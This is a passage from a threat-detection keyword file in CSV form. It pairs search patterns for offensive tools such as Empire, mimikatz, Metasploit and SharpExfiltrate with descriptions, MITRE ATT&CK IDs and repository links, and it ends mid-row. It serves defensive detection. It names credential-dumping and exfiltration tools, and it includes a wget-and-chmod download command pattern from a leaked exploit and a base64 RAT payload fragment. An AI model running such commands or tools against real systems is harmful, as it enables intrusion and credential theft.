*backdoor*",".{0,1000}usestager\s.{0,1000}backdoor.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*usestager *ducky*",".{0,1000}usestager\s.{0,1000}ducky.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*usestager *launcher_bat*",".{0,1000}usestager\s.{0,1000}launcher_bat.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*usestager *launcher_lnk*",".{0,1000}usestager\s.{0,1000}launcher_lnk.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*usestager *shellcode*",".{0,1000}usestager\s.{0,1000}shellcode.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*usestager multi/launcher*",".{0,1000}usestager\smulti\/launcher.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*using donutCS*",".{0,1000}using\sdonutCS.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*using KrbRelayUp.*",".{0,1000}using\sKrbRelayUp\..{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*using NixImports*",".{0,1000}using\sNixImports.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","0","N/A","N/A","2","199","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" "*using SharpExfiltrate*",".{0,1000}using\sSharpExfiltrate.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","123","35","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*using SharpUp.Classes*",".{0,1000}using\sSharpUp\.Classes.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*using SharpView.Enums*",".{0,1000}using\sSharpView\.Enums.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","10","10","921","179","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z" "*using SMBeagle*",".{0,1000}using\sSMBeagle.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","675","78","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" "*using static BackupCreds.Interop*",".{0,1000}using\sstatic\sBackupCreds\.Interop.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","9","1","51","6","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z" "*using static SharpUp.Utilities*",".{0,1000}using\sstatic\sSharpUp\.Utilities.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*Using VirusToal website as external C2*",".{0,1000}Using\sVirusToal\swebsite\sas\sexternal\sC2.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*UsoDllLoader*",".{0,1000}UsoDllLoader.{0,1000}","offensive_tool_keyword","UsoDllLoader","This PoC shows a technique that can be used to weaponize privileged file write vulnerabilities on Windows. It provides an alternative to the DiagHub DLL loading exploit ","T1210.001 - T1055 - T1574.001","TA0007 - TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/itm4n/UsoDllLoader","1","1","N/A","N/A","4","371","104","2020-06-06T11:05:12Z","2019-08-01T17:58:16Z" "*usr/bin/wget -O /tmp/a http* chmod 755 /tmp/cron*",".{0,1000}usr\/bin\/wget\s\-O\s\/tmp\/a\shttp.{0,1000}\schmod\s755\s\/tmp\/cron.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file echowrecker. samba 2.2 and 3.0.2a - 3.0.12-5 RCE (with DWARF symbols) for FreeBSD OpenBSD 3.1 OpenBSD 3.2 (with a non-executable stack zomg) and Linux. Likely CVE-2003-0201. There is also a Solaris version","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/echowrecker","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*usr/share/seclists*",".{0,1000}usr\/share\/seclists.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*usr/src/rusthound rusthound *",".{0,1000}usr\/src\/rusthound\srusthound\s.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "*util.nimplant*",".{0,1000}util\.nimplant.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*util/dot_net_deserialization/*",".{0,1000}util\/dot_net_deserialization\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*utils/payloads.db*",".{0,1000}utils\/payloads\.db.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","10","N/A","N/A","N/A","N/A" "*Utils\Posh.cs*",".{0,1000}Utils\\Posh\.cs.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*UTJzMVVGZ3diRkZZTUdoUVZURlJaMUJUUVc1YU1qbDJXako0YkZreWFIbGlNakZzV1ZoV01HSjVOWHBhV0VveVdsZHNlVmw1TldwaU1qQnVRMnQ0U1ZReFRsVkpSREJuU25wRk5VMXBOSGhPYW1kMVRWTTBla3AzY0UxVlJUbFRWa05CT1VsRVVUQk5kM0JWVTFVeFJsZ3hUazFTVlZaUlNVUXdaMDFVUVV0RGJGSkdWRlpDWmxWRlJsVlRRMEU1U1VoU2JHSllRbTFoVjN*",".{0,1000}UTJzMVVGZ3diRkZZTUdoUVZURlJaMUJUUVc1YU1qbDJXako0YkZreWFIbGlNakZzV1ZoV01HSjVOWHBhV0VveVdsZHNlVmw1TldwaU1qQnVRMnQ0U1ZReFRsVkpSREJuU25wRk5VMXBOSGhPYW1kMVRWTTBla3AzY0UxVlJUbFRWa05CT1VsRVVUQk5kM0JWVTFVeFJsZ3hUazFTVlZaUlNVUXdaMDFVUVV0RGJGSkdWRlpDWmxWRlJsVlRRMEU1U1VoU2JHSllRbTFoVjN.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","base64","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*v1k1ngfr.github.io/fuegoshell/*",".{0,1000}v1k1ngfr\.github\.io\/fuegoshell\/.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","1","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*v1k1ngfr/fuegoshell*",".{0,1000}v1k1ngfr\/fuegoshell.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","1","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*V3n0M-Scanner*",".{0,1000}V3n0M\-Scanner.{0,1000}","offensive_tool_keyword","V3n0M-Scanner","V3n0M is a free and open source scanner. Evolved from baltazars scanner. it has adapted several new features that improve fuctionality and usability. It is mostly experimental software. This program is for finding and executing various vulnerabilities. It scavenges the web using dorks and organizes the URLs it finds. Use at your own risk.","T1210.001 - T1190 - T1191 - T1595","TA0007 - TA0002 - TA0008 - TA0010","N/A","N/A","Web Attacks","https://github.com/v3n0m-Scanner/V3n0M-Scanner","1","1","N/A","N/A","10","1419","411","2023-11-14T23:05:16Z","2013-10-21T06:05:17Z" "*v4d1/Dome*",".{0,1000}v4d1\/Dome.{0,1000}","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","5","451","62","2024-02-07T09:12:17Z","2022-02-20T15:09:40Z" "*valid_user@contoso.com:Password1*",".{0,1000}valid_user\@contoso\.com\:Password1.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","220","38","2024-04-12T21:42:47Z","2020-02-18T12:22:50Z" "*vanhauser-thc/thc-hydra*",".{0,1000}vanhauser\-thc\/thc\-hydra.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*vault::*",".{0,1000}vault\:\:.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*vault::cred*",".{0,1000}vault\:\:cred.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*vault::list*",".{0,1000}vault\:\:list.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*VBA Obfuscation Tools combined with an MS office document generator*",".{0,1000}VBA\sObfuscation\sTools\scombined\swith\san\sMS\soffice\sdocument\sgenerator.{0,1000}","offensive_tool_keyword","vbad","VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. It aims to help Red & Blue team for attack or defense.","T1564 - T1117 - T1204 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Pepitoh/Vbad","1","0","N/A","8","6","517","128","2017-10-15T12:56:18Z","2016-03-09T12:36:04Z" "*Vbad/VBad.py*",".{0,1000}Vbad\/VBad\.py.{0,1000}","offensive_tool_keyword","vbad","VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. It aims to help Red & Blue team for attack or defense.","T1564 - T1117 - T1204 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Pepitoh/Vbad","1","1","N/A","8","6","517","128","2017-10-15T12:56:18Z","2016-03-09T12:36:04Z" "*vba-macro-mac-persistence.vbs*",".{0,1000}vba\-macro\-mac\-persistence\.vbs.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2434","474","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" "*VBA-RunPE -*",".{0,1000}VBA\-RunPE\s\-.{0,1000}","offensive_tool_keyword","VBA-RunPE","A simple yet effective implementation of the RunPE technique in VBA. This code can be used to run executables from the memory of Word or Excel. It is compatible with both 32 bits and 64 bits versions of Microsoft Office 2010 and above.","T1055 - T1218 - T1059","TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://github.com/itm4n/VBA-RunPE","1","0","N/A","N/A","8","777","179","2019-12-17T10:32:43Z","2018-01-28T19:50:44Z" "*vba-windows-persistence.vbs*",".{0,1000}vba\-windows\-persistence\.vbs.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2434","474","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" "*vbs_obfuscator.vbs*",".{0,1000}vbs_obfuscator\.vbs.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*vbs_ofuscator.vbs*",".{0,1000}vbs_ofuscator\.vbs.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*vbs-obfuscator.py*",".{0,1000}vbs\-obfuscator\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*VbulletinWidgetTemplateRce.py*",".{0,1000}VbulletinWidgetTemplateRce\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*vcenter_forge_saml_token*",".{0,1000}vcenter_forge_saml_token.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - 